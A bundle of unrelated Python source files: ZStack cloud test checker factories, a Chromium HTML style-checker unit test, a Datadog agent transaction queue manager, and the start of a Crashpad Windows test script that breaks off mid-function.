checker_dict[db_checker.zstack_vm_db_checker] = True
checker_dict[vm_checker.zstack_kvm_vm_destroyed_checker] = True
elif test_obj.state == vm_header.EXPUNGED:
checker_dict[db_checker.zstack_vm_db_checker] = True
kvm_vm_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_vm_checker_chain
class KvmVolumeCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_volume_checker_chain = checker_header.CheckerChain()
checker_dict = {}
if test_obj.state == volume_header.CREATED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = False
elif test_obj.state == volume_header.ATTACHED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = True
if not test_obj.target_vm.state == vm_header.DESTROYED:
checker_dict[db_checker.zstack_volume_attach_db_checker] = True
if test_obj.target_vm.state == vm_header.RUNNING:
checker_dict[volume_checker.zstack_kvm_volume_attach_checker] = True
else:
checker_dict[db_checker.zstack_volume_attach_db_checker] = False
elif test_obj.state == volume_header.DETACHED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[db_checker.zstack_volume_attach_db_checker] = False
checker_dict[volume_checker.zstack_kvm_volume_attach_checker] = False
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = True
elif test_obj.state == volume_header.DELETED:
checker_dict[db_checker.zstack_volume_db_checker] = True
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = True
elif test_obj.state == volume_header.EXPUNGED:
checker_dict[db_checker.zstack_volume_db_checker] = False
checker_dict[volume_checker.zstack_kvm_volume_file_checker] = False
kvm_volume_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_volume_checker_chain
class KvmImageCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_image_checker_chain = checker_header.CheckerChain()
checker_dict = {}
if test_obj.state == image_header.CREATED:
checker_dict[db_checker.zstack_image_db_checker] = True
checker_dict[image_checker.zstack_kvm_image_file_checker] = True
if test_obj.state == image_header.DELETED:
checker_dict[db_checker.zstack_image_db_checker] = True
checker_dict[image_checker.zstack_kvm_image_file_checker] = True
if test_obj.state == image_header.EXPUNGED:
checker_dict[db_checker.zstack_image_db_checker] = False
checker_dict[image_checker.zstack_kvm_image_file_checker] = False
kvm_image_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_image_checker_chain
class KvmSecurityGroupCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_sg_checker_chain = checker_header.CheckerChain()
checker_dict = {}
for nic_uuid in test_obj.get_all_nics():
target_vm = test_obj.get_vm_by_nic(nic_uuid)
if target_vm.state == vm_header.RUNNING:
if test_lib.lib_is_vm_sim(target_vm.vm):
kvm_sg_checker_chain.add_checker(db_checker.zstack_sg_db_checker(True), test_obj)
continue
if not test_lib.lib_is_vm_kvm(target_vm.vm):
continue
if test_obj.get_nic_tcp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_internal_vms_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_tcp_egress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
if not test_obj.get_nic_tcp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_tcp_internal_vms_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_udp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_udp_egress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_icmp_ingress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_internal_vms_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
if test_obj.get_nic_icmp_egress_rules(nic_uuid):
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, True, test_obj)
#if not test_obj.get_nic_icmp_ingress_rules(nic_uuid):
# checker = sg_checker.zstack_kvm_sg_icmp_internal_vms_checker()
# checker.set_nic_uuid(nic_uuid)
# kvm_sg_checker_chain.add_checker(checker, True, test_obj)
else:
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
else:
#TODO: only do iptables rules check
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_nic_uuid(nic_uuid)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
for test_vm in test_obj.get_detached_vm():
vm = test_vm.vm
if not test_lib.lib_is_vm_kvm(vm):
continue
checker = sg_checker.zstack_kvm_sg_tcp_ingress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_tcp_egress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_egress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_icmp_ingress_exist_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_ingress_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
checker = sg_checker.zstack_kvm_sg_udp_egress_checker()
checker.set_vm(vm)
kvm_sg_checker_chain.add_checker(checker, False, test_obj)
return kvm_sg_checker_chain
class KvmPortForwardingCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
kvm_pf_checker_chain = checker_header.CheckerChain()
checker_dict = {}
pf_rule = test_obj.get_port_forwarding()
if test_obj.get_state() == pf_header.ATTACHED and \
test_obj.get_target_vm().get_state() == vm_header.RUNNING:
if pf_rule.protocolType == inventory.TCP:
checker_dict[pf_checker.zstack_kvm_pf_tcp_checker] = True
if pf_rule.protocolType == inventory.UDP:
checker_dict[pf_checker.zstack_kvm_pf_rule_exist_checker] = True
elif test_obj.get_state() == pf_header.ATTACHED and test_obj.get_target_vm().get_state() == vm_header.STOPPED:
checker_dict[pf_checker.zstack_kvm_pf_vip_icmp_checker] = False
if pf_rule.protocolType == inventory.TCP:
checker_dict[pf_checker.zstack_kvm_pf_tcp_checker] = False
elif test_obj.get_state() == pf_header.DETACHED:
checker_dict[pf_checker.zstack_kvm_pf_vip_icmp_checker] = False
kvm_pf_checker_chain.add_checker_dict(checker_dict, test_obj)
return kvm_pf_checker_chain
class HostCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
host_checker_chain = checker_header.CheckerChain()
checker = host_checker.zstack_kvm_host_checker()
host_checker_chain.add_checker(checker, True, test_obj)
return host_checker_chain
class EipCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
eip_checker_chain = checker_header.CheckerChain()
checker = eip_checker.eip_checker()
eip_checker_chain.add_checker(checker, True, test_obj)
return eip_checker_chain
class VipCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
vip_checker_chain = checker_header.CheckerChain()
if test_obj.get_state() == vip_header.ATTACHED:
if test_obj.get_use_for() == vip_header.PortForwarding:
checker = vip_checker.vip_used_for_checker()
checker.set_target_use_for(vip_header.PortForwarding)
vip_checker_chain.add_checker(checker, True, test_obj)
vip_checker_chain.add_checker(vip_checker.pf_checker(), True, test_obj)
for pf in test_obj.get_pf_list_for_running_vm():
vip_checker_chain.add_checker(pf_checker.zstack_kvm_pf_rule_exist_checker(), True, pf)
for pf in test_obj.get_pf_list_for_stopped_vm():
#vip_checker_chain.add_checker(pf_checker.zstack_kvm_pf_rule_exist_checker(), True, pf)
pass
elif test_obj.get_use_for() == vip_header.Eip:
checker = vip_checker.vip_used_for_checker()
checker.set_target_use_for(vip_header.Eip)
vip_checker_chain.add_checker(checker, True, test_obj)
vip_checker_chain.add_checker(vip_checker.eip_checker(), True, test_obj)
elif test_obj.get_state() == vip_header.DETACHED:
vip_checker_chain.add_checker(vip_checker.vip_icmp_checker(), False, test_obj)
elif test_obj.get_state() == vip_header.CREATED:
vip_checker_chain.add_checker(vip_checker.vip_icmp_checker(), False, test_obj)
elif test_obj.get_state() == vip_header.DELETED:
vip_checker_chain.add_checker(vip_checker.vip_icmp_checker(), False, test_obj)
return vip_checker_chain
class SnapshotCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
sp_checker_chain = checker_header.CheckerChain()
if test_obj.get_target_volume().get_volume():
#target volume is not deleted.
sp_checker_chain.add_checker(\
sp_checker.zstack_kvm_snapshot_checker(), True, test_obj)
ps_uuid = test_obj.get_target_volume().get_volume().primaryStorageUuid
if test_lib.lib_is_ps_iscsi_backend(ps_uuid):
sp_checker_chain.add_checker(\
sp_checker.zstack_kvm_snapshot_tree_checker(), True, \
test_obj)
if test_obj.get_backuped_snapshots():
sp_checker_chain.add_checker(\
sp_checker.zstack_kvm_backuped_snapshot_checker(), \
True, test_obj)
return sp_checker_chain
class LoadBalancerCheckerFactory(checker_header.CheckerFactory):
def create_checker(self, test_obj):
lb_checker_chain = checker_header.CheckerChain()
if test_obj.get_state() != lb_header.DELETED:
lb_checker_chain.add_checker(db_checker.zstack_lb_db_checker(), \
True, test_obj)
for lbl in test_obj.get_load_balancer_listeners().values():
if lbl.get_state() != lb_header.DELETED:
checker = lb_checker.zstack_kvm_lbl_checker()
checker.set_lbl(lbl)
lb_checker_chain.add_checker(checker, True, test_obj)
if test_obj.get_load_balancer_listeners():
if test_obj.is_separated_vr():
lb_checker_chain.add_checker(\
db_checker.zstack_alone_lb_vr_db_checker(),\
True, test_obj)
else:
lb_checker_chain.add_checker(\
db_checker.zstack_alone_lb_vr_db_checker(),\
False, test_obj)
else:
lb_checker_chain.add_checker(db_checker.zstack_lb_db_checker(), \
False, test_obj)
return lb_checker_chain
|
|
#!/usr/bin/env python3
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from . import html_checker
from os import path as os_path
import re
from sys import path as sys_path
from . import test_util
import unittest
_HERE = os_path.dirname(os_path.abspath(__file__))
sys_path.append(os_path.join(_HERE, '..', '..'))
from PRESUBMIT_test_mocks import MockInputApi, MockOutputApi
class HtmlCheckerTest(unittest.TestCase):
def setUp(self):
super(HtmlCheckerTest, self).setUp()
self.checker = html_checker.HtmlChecker(MockInputApi(), MockOutputApi())
def ShouldFailCheck(self, line, checker):
"""Checks that the |checker| flags |line| as a style error."""
error = checker(1, line)
self.assertNotEqual('', error, 'Should be flagged as style error: ' + line)
highlight = test_util.GetHighlight(line, error).strip()
def ShouldPassCheck(self, line, checker):
"""Checks that the |checker| doesn't flag |line| as a style error."""
error = checker(1, line)
self.assertEqual('', error, 'Should not be flagged as style error: ' + line)
def testClassesUseDashFormCheckFails(self):
lines = [
' <a class="Foo-bar" href="classBar"> ',
'<b class="foo-Bar"> ',
'<i class="foo_bar" >',
' <hr class="fooBar"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.ClassesUseDashFormCheck)
def testClassesUseDashFormCheckPasses(self):
lines = [
' class="abc" ',
'class="foo-bar"',
'<div class="foo-bar" id="classBar"',
'<div class="foo $i18n{barBazQux}" id="classBar"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.ClassesUseDashFormCheck)
def testSingleQuoteCheckFails(self):
lines = [
""" <a href='classBar'> """,
"""<a foo$="bar" href$='classBar'>""",
"""<a foo="bar" less="more" href='classBar' kittens="cats">""",
"""<a cats href='classBar' dogs>""",
"""<a cats\n href='classBat\nclassBaz'\n dogs>""",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testSingleQuoteCheckPasses(self):
lines = [
"""<b id="super-valid">SO VALID!</b>""",
"""<a text$="i ain't got invalid quotes">i don't</a>""",
"""<span>[[i18n('blah')]]</span> """,
"""<a cats href="classBar" dogs>""",
"""<a cats\n href="classBar"\n dogs>""",
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseSingleQuotesCheck)
def testDoNotCloseSingleTagsCheckFails(self):
lines = [
"<input/>",
' <input id="a" /> ',
"<div/>",
"<br/>",
"<br />",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotCloseSingleTagsCheckPasses(self):
lines = [
"<input>",
"<link>",
"<div></div>",
'<input text="/">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotCloseSingleTagsCheck)
def testDoNotUseBrElementCheckFails(self):
lines = [
" <br>",
"<br > ",
"<br\>",
'<br name="a">',
]
for line in lines:
self.ShouldFailCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseBrElementCheckPasses(self):
lines = [
"br",
"br>",
"<browser-switch-app></browser-switch-app>",
"give me a break"
]
for line in lines:
self.ShouldPassCheck(
line, self.checker.DoNotUseBrElementCheck)
def testDoNotUseInputTypeButtonCheckFails(self):
lines = [
'<input type="button">',
' <input id="a" type="button" >',
'<input type="button" id="a"> ',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testDoNotUseInputTypeButtonCheckPasses(self):
lines = [
"<input>",
'<input type="text">',
'<input type="result">',
'<input type="submit">',
"<button>",
'<button type="button">',
'<button type="reset">',
'<button type="submit">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.DoNotUseInputTypeButtonCheck)
def testI18nContentJavaScriptCaseCheckFails(self):
lines = [
' i18n-content="foo-bar" ',
'i18n-content="foo_bar"',
'i18n-content="FooBar"',
'i18n-content="_foo"',
'i18n-content="foo_"',
'i18n-content="-foo"',
'i18n-content="foo-"',
'i18n-content="Foo"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testI18nContentJavaScriptCaseCheckPasses(self):
lines = [
' i18n-content="abc" ',
'i18n-content="fooBar"',
'i18n-content="validName" attr="invalidName_"',
'<div i18n-content="exampleTitle"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.I18nContentJavaScriptCaseCheck)
def testImportCorrectPolymerHtmlFails(self):
bad_url = 'chrome://resources/polymer/v1_0/polymer/polymer.html'
lines = [
'<link rel="import" href="%s">' % bad_url,
'<link href="%s" rel="import">' % bad_url,
]
for line in lines:
self.ShouldFailCheck(line, self.checker.ImportCorrectPolymerHtml)
def testImportCorrectPolymerHtmlPasses(self):
good_url = 'chrome://resources/html/polymer.html'
lines = [
'<link rel="import" href="%s">' % good_url,
'<link href="%s" rel="import">' % good_url,
]
for line in lines:
self.ShouldPassCheck(line, self.checker.ImportCorrectPolymerHtml)
def testLabelCheckFails(self):
lines = [
' <label for="abc"',
" <label for= ",
" <label\tfor= ",
' <label\n blah="1" blee="3"\n for="goop"',
]
for line in lines:
self.ShouldFailCheck(line, self.checker.LabelCheck)
def testLabelCheckPasses(self):
lines = [
' my-for="abc" ',
' myfor="abc" ',
" <for",
' <paper-tooltip for="id-name"',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.LabelCheck)
def testQuotePolymerBindingsFails(self):
lines = [
"<a href=[[blah]]>",
"<div class$=[[class_]]>",
"<settings-checkbox prefs={{prefs}}",
"<paper-button actionable$=[[isActionable_(a,b)]]>",
]
for line in lines:
self.ShouldFailCheck(line, self.checker.QuotePolymerBindings)
def testQuotePolymerBindingsPasses(self):
lines = [
'<a href="[[blah]]">',
'<span id="blah">[[text]]</span>',
'<setting-checkbox prefs="{{prefs}}">',
'<paper-input tab-index="[[tabIndex_]]">',
'<div style="font: [[getFont_(item)]]">',
]
for line in lines:
self.ShouldPassCheck(line, self.checker.QuotePolymerBindings)
if __name__ == '__main__':
unittest.main()
|
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
from datetime import datetime, timedelta
import logging
from operator import attrgetter
import sys
import time
# project
from checks.check_status import ForwarderStatus
from util import get_tornado_ioloop, plural
log = logging.getLogger(__name__)
FLUSH_LOGGING_PERIOD = 20
FLUSH_LOGGING_INITIAL = 5
class Transaction(object):
def __init__(self):
self._id = None
self._error_count = 0
self._next_flush = datetime.utcnow()
self._size = None
def get_id(self):
return self._id
def set_id(self, new_id):
assert self._id is None
self._id = new_id
def inc_error_count(self):
self._error_count = self._error_count + 1
def get_error_count(self):
return self._error_count
def get_size(self):
if self._size is None:
self._size = sys.getsizeof(self)
return self._size
def get_next_flush(self):
return self._next_flush
def compute_next_flush(self,max_delay):
# Transactions are replayed, try to send them faster for newer transactions
# Send them every MAX_WAIT_FOR_REPLAY at most
td = timedelta(seconds=self._error_count * 20)
if td > max_delay:
td = max_delay
newdate = datetime.utcnow() + td
self._next_flush = newdate.replace(microsecond=0)
def time_to_flush(self,now = datetime.utcnow()):
return self._next_flush <= now
def flush(self):
raise NotImplementedError("To be implemented in a subclass")
class TransactionManager(object):
"""Holds any transaction derived object list and make sure they
are all commited, without exceeding parameters (throttling, memory consumption) """
def __init__(self, max_wait_for_replay, max_queue_size, throttling_delay,
max_parallelism=1, max_endpoint_errors=4):
self._MAX_WAIT_FOR_REPLAY = max_wait_for_replay
self._MAX_QUEUE_SIZE = max_queue_size
self._THROTTLING_DELAY = throttling_delay
self._MAX_PARALLELISM = max_parallelism
self._MAX_ENDPOINT_ERRORS = max_endpoint_errors
self._flush_without_ioloop = False # useful for tests
self._transactions = [] # List of all non commited transactions
self._total_count = 0 # Maintain size/count not to recompute it everytime
self._total_size = 0
self._flush_count = 0
self._running_flushes = 0
self._transactions_received = 0
self._transactions_flushed = 0
self._too_big_count = 0
# Global counter to assign a number to each transaction: we may have an issue
# if this overlaps
self._counter = 0
self._trs_to_flush = None # Current transactions being flushed
self._last_flush = datetime.utcnow() # Last flush (for throttling)
# Error management
self._endpoints_errors = {}
self._finished_flushes = 0
# Track an initial status message.
ForwarderStatus().persist()
def get_transactions(self):
return self._transactions
def print_queue_stats(self):
log.debug("Queue size: at %s, %s transaction(s), %s KB" %
(time.time(), self._total_count, (self._total_size/1024)))
def get_tr_id(self):
self._counter = self._counter + 1
return self._counter
def append(self,tr):
# Give the transaction an id
tr.set_id(self.get_tr_id())
# Check the size
tr_size = tr.get_size()
log.debug("New transaction to add, total size of queue would be: %s KB" %
((self._total_size + tr_size) / 1024))
if (self._total_size + tr_size) > self._MAX_QUEUE_SIZE:
log.warn("Queue is too big, removing old transactions...")
new_trs = sorted(self._transactions,key=attrgetter('_next_flush'), reverse = True)
for tr2 in new_trs:
if (self._total_size + tr_size) > self._MAX_QUEUE_SIZE:
self._transactions.remove(tr2)
self._total_count = self._total_count - 1
self._total_size = self._total_size - tr2.get_size()
log.warn("Removed transaction %s from queue" % tr2.get_id())
# Done
self._transactions.append(tr)
self._total_count += 1
self._transactions_received += 1
self._total_size = self._total_size + tr_size
log.debug("Transaction %s added" % (tr.get_id()))
self.print_queue_stats()
def flush(self):
if self._trs_to_flush is not None:
log.debug("A flush is already in progress, not doing anything")
return
to_flush = []
# Do we have something to do ?
now = datetime.utcnow()
for tr in self._transactions:
if tr.time_to_flush(now):
to_flush.append(tr)
count = len(to_flush)
should_log = self._flush_count + 1 <= FLUSH_LOGGING_INITIAL or (self._flush_count + 1) % FLUSH_LOGGING_PERIOD == 0
if count > 0:
if should_log:
log.info("Flushing %s transaction%s during flush #%s" % (count,plural(count), str(self._flush_count + 1)))
else:
log.debug("Flushing %s transaction%s during flush #%s" % (count,plural(count), str(self._flush_count + 1)))
self._endpoints_errors = {}
self._finished_flushes = 0
# We sort LIFO-style, taking into account errors
self._trs_to_flush = sorted(to_flush, key=lambda tr: (- tr._error_count, tr._id))
self._flush_time = datetime.utcnow()
self.flush_next()
else:
if should_log:
log.info("No transaction to flush during flush #%s" % str(self._flush_count + 1))
else:
log.debug("No transaction to flush during flush #%s" % str(self._flush_count + 1))
if self._flush_count + 1 == FLUSH_LOGGING_INITIAL:
log.info("First flushes done, next flushes will be logged every %s flushes." % FLUSH_LOGGING_PERIOD)
self._flush_count += 1
ForwarderStatus(
queue_length=self._total_count,
queue_size=self._total_size,
flush_count=self._flush_count,
transactions_received=self._transactions_received,
transactions_flushed=self._transactions_flushed,
too_big_count=self._too_big_count).persist()
def flush_next(self):
if self._trs_to_flush is not None and len(self._trs_to_flush) > 0:
td = self._last_flush + self._THROTTLING_DELAY - datetime.utcnow()
delay = td.total_seconds()
if delay <= 0 and self._running_flushes < self._MAX_PARALLELISM:
tr = self._trs_to_flush.pop()
self._running_flushes += 1
self._last_flush = datetime.utcnow()
log.debug("Flushing transaction %d", tr.get_id())
try:
tr.flush()
except Exception as e:
log.exception(e)
self.tr_error(tr)
self.flush_next()
# Every running flushes relaunches a flush once it's finished
# If we are already at MAX_PARALLELISM, do nothing
# Otherwise, schedule a flush as soon as possible (throttling)
elif self._running_flushes < self._MAX_PARALLELISM:
# Wait a little bit more
tornado_ioloop = get_tornado_ioloop()
if tornado_ioloop._running:
tornado_ioloop.add_timeout(time.time() + delay,
lambda: self.flush_next())
elif self._flush_without_ioloop:
# Tornado is no started (ie, unittests), do it manually: BLOCKING
time.sleep(delay)
self.flush_next()
# Setting self._trs_to_flush to None means the flush is over.
# So it is oly set when there is no more running flushes.
# (which corresponds to the last flush calling flush_next)
elif self._running_flushes == 0:
self._trs_to_flush = None
log.debug('Flush %s took %ss (%s transactions)',
self._flush_count,
(datetime.utcnow() - self._flush_time).total_seconds(),
self._finished_flushes)
else:
log.debug("Flush in progress, %s flushes running", self._running_flushes)
def tr_error(self, tr):
self._running_flushes -= 1
self._finished_flushes += 1
tr.inc_error_count()
tr.compute_next_flush(self._MAX_WAIT_FOR_REPLAY)
log.warn("Transaction %d in error (%s error%s), it will be replayed after %s",
tr.get_id(),
tr.get_error_count(),
plural(tr.get_error_count()),
tr.get_next_flush())
self._endpoints_errors[tr._endpoint] = self._endpoints_errors.get(tr._endpoint, 0) + 1
# Endpoint failed too many times, it's probably an enpoint issue
# Let's avoid blocking on it
if self._endpoints_errors[tr._endpoint] == self._MAX_ENDPOINT_ERRORS:
new_trs_to_flush = []
for transaction in self._trs_to_flush:
if transaction._endpoint != tr._endpoint:
new_trs_to_flush.append(transaction)
else:
transaction.compute_next_flush(self._MAX_WAIT_FOR_REPLAY)
log.debug('Endpoint %s seems down, removed %s transaction from current flush',
tr._endpoint,
len(self._trs_to_flush) - len(new_trs_to_flush))
self._trs_to_flush = new_trs_to_flush
def tr_error_too_big(self, tr):
self._running_flushes -= 1
self._finished_flushes += 1
tr.inc_error_count()
log.warn("Transaction %d is %sKB, it has been rejected as too large. "
"It will not be replayed.",
tr.get_id(),
tr.get_size() / 1024)
self._transactions.remove(tr)
self._total_count -= 1
self._total_size -= tr.get_size()
self._transactions_flushed += 1
self.print_queue_stats()
self._too_big_count += 1
ForwarderStatus(
queue_length=self._total_count,
queue_size=self._total_size,
flush_count=self._flush_count,
transactions_received=self._transactions_received,
transactions_flushed=self._transactions_flushed,
too_big_count=self._too_big_count).persist()
def tr_success(self, tr):
self._running_flushes -= 1
self._finished_flushes += 1
log.debug("Transaction %d completed", tr.get_id())
self._transactions.remove(tr)
self._total_count -= 1
self._total_size -= tr.get_size()
self._transactions_flushed += 1
self.print_queue_stats()
|
|
#!/usr/bin/env python
# Copyright 2015 The Crashpad Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import platform
import pywintypes
import random
import re
import subprocess
import sys
import tempfile
import time
import win32con
import win32pipe
import winerror
g_temp_dirs = []
g_had_failures = False
def MakeTempDir():
global g_temp_dirs
new_dir = tempfile.mkdtemp()
g_temp_dirs.append(new_dir)
return new_dir
def CleanUpTempDirs():
global g_temp_dirs
for d in g_temp_dirs:
subprocess.call(['rmdir', '/s', '/q', d], shell=True)
def FindInstalledWindowsApplication(app_path):
search_paths = [
os.getenv('PROGRAMFILES(X86)'),
os.getenv('PROGRAMFILES'),
os.getenv('PROGRAMW6432'),
os.getenv('LOCALAPPDATA')
]
search_paths += os.getenv('PATH', '').split(os.pathsep)
for search_path in search_paths:
if not search_path:
continue
path = os.path.join(search_path, app_path)
if os.path.isfile(path):
return path
return None
def GetCdbPath():
"""Search in some reasonable places to find cdb.exe. Searches x64 before x86
and newer versions before older versions.
"""
possible_paths = (
os.path.join('Windows Kits', '10', 'Debuggers', 'x64'),
os.path.join('Windows Kits', '10', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.1', 'Debuggers', 'x64'),
os.path.join('Windows Kits', '8.1', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x64'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x86'),
'Debugging Tools For Windows (x64)',
'Debugging Tools For Windows (x86)',
'Debugging Tools For Windows',
)
for possible_path in possible_paths:
app_path = os.path.join(possible_path, 'cdb.exe')
app_path = FindInstalledWindowsApplication(app_path)
if app_path:
return app_path
return None
def NamedPipeExistsAndReady(pipe_name):
"""Returns False if pipe_name does not exist. If pipe_name does exist,
blocks until the pipe is ready to service clients, and then returns True.
This is used as a drop-in replacement for os.path.exists() and os.access()
to test for the pipe's existence. Both of those calls tickle the pipe in a
way that appears to the server to be a client connecting, triggering error
messages when no data is received.
Although this function only needs to test pipe existence (waiting for
CreateNamedPipe()), it actually winds up testing pipe readiness (waiting for
ConnectNamedPipe()). This is unnecessary but harmless.
"""
try:
win32pipe.WaitNamedPipe(pipe_name, win32pipe.NMPWAIT_WAIT_FOREVER)
except pywintypes.error as e:
if e[0] == winerror.ERROR_FILE_NOT_FOUND:
return False
raise
return True
def GetDumpFromProgram(out_dir, pipe_name, executable_name, expect_exit_code,
*args):
"""Initialize a crash database, and run |executable_name| connecting to a
crash handler. If pipe_name is set, crashpad_handler will be started first.
If pipe_name is empty, the executable is responsible for starting
crashpad_handler. *args will be passed after other arguments to
executable_name. If the child process does not exit with |expect_exit_code|,
an exception will be raised. Returns the path to the minidump generated by
crashpad_handler for further testing.
"""
test_database = MakeTempDir()
handler = None
try:
subprocess.check_call([
os.path.join(out_dir, 'crashpad_database_util.exe'), '--create',
'--database=' + test_database
])
if pipe_name is not None:
handler = subprocess.Popen([
